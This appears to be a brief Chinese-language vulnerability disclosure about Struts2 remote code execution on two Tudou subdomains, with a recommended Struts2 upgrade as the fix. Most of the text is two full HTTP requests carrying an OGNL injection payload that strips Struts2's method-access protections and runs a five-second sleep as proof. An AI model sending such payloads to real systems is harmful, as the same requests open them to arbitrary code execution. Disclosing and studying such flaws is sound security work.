土豆channels.tudou.com[频道]分站远程代码执行 漏洞 sleep 5秒测试代码: POST /director/listRecommend.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: channels.tudou.com Content-Length: 258 www.2cto.com ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d)) 土豆survey.tudou.com[调查]分站远程代码执行漏洞 sleep 5秒测试代码: POST /iresearch/tudouCPM_nielsen.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: survey.tudou.com Content-Length: 258 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d)) 修复方案: 更新Struts2至最新官方稳定版 作者 CnCxzSec(衰仔)
查看更多关于土豆两个分站远程代码执行漏洞 - 网站安全 - 自的详细内容...